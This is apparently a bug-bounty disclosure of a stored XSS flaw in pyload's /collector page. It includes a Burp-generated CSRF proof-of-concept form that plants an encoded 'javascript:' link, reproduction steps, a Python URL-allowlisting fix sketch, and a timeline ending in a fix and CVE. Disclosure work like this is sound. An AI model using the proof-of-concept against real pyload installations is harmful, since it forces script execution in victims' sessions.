Stored XSS in pyload/pyload


Reported on Jan 9th 2023


The /collector page is vulnerable to stored XSS.


  1. Open the following file in the browser:
     <!-- CSRF PoC - generated by Burp Suite Professional -->
     <script>history.pushState('', '', '/')</script>
     <form action="" method="POST">
       <input type="hidden" name="package" value="XSS" />
       <input type="hidden" name="urls" value="javascript&#58;alert&#40;&#96;XSS&#96;&#41;" />
       <input type="submit" value="Submit request" />
     </form>
  2. Log in as user.
  3. Go to http://localhost:9666/collector
  4. Click XSS > alert(`XSS`)


An attacker can force a victim to run malicious JavaScript code.
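
One way to close this class of bug is to allowlist URL schemes before a stored link is rendered as a clickable anchor, and to escape the value on output. The sketch below is an added example, not pyload's code and not the fix in commit 46d75a; `ALLOWED_SCHEMES`, `normalize_link` and `render_link` are hypothetical names, and the sample inputs are constructed.

```python
import html
from urllib.parse import urlsplit

# Assumption: the only schemes a download link needs on this page.
ALLOWED_SCHEMES = {"http", "https", "ftp"}
# Browsers drop tab, CR and LF from a URL before parsing it.
_STRIP = str.maketrans("", "", "\t\r\n")


def normalize_link(raw):
    """Return the cleaned URL if its scheme is allowlisted, else None."""
    url = raw.strip().translate(_STRIP)
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 host
        return None
    # Allowlist, not denylist: anything without an approved scheme and a
    # host (javascript:, data:, relative paths, "http:foo") is rejected.
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return url


def render_link(raw):
    """Render a stored link: clickable only when allowlisted, always escaped."""
    url = normalize_link(raw)
    if url is None:
        # Show the rejected value as inert text so the user can still see it.
        return "<span>{}</span>".format(html.escape(raw, quote=True))
    safe = html.escape(url, quote=True)
    return '<a href="{0}" rel="noopener noreferrer">{0}</a>'.format(safe)


if __name__ == "__main__":
    # Constructed samples: the value from the PoC above plus a benign link.
    for sample in (
        "javascript:alert(`XSS`)",
        "javascript&#58;alert&#40;&#96;XSS&#96;&#41;",
        " Java\tScript:alert(1)",
        'https://example.com/a?x=1&y="2"',
    ):
        print(repr(sample), "->", render_link(sample))
```
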

We are processing your report and will contact the pyload team within 24 hours. 3 months ago
bAu modified the report 3 months ago
We have contacted a member of the pyload team and are waiting to hear back 3 months ago
pyload/pyload maintainer validated this vulnerability 2 months ago
bAu has been awarded the disclosure bounty
pyload/pyload maintainer marked this as fixed in 0.5.0b3.dev42 with commit 46d75a 2 months ago
This vulnerability has been assigned a CVE
pyload/pyload maintainer published this vulnerability 2 months ago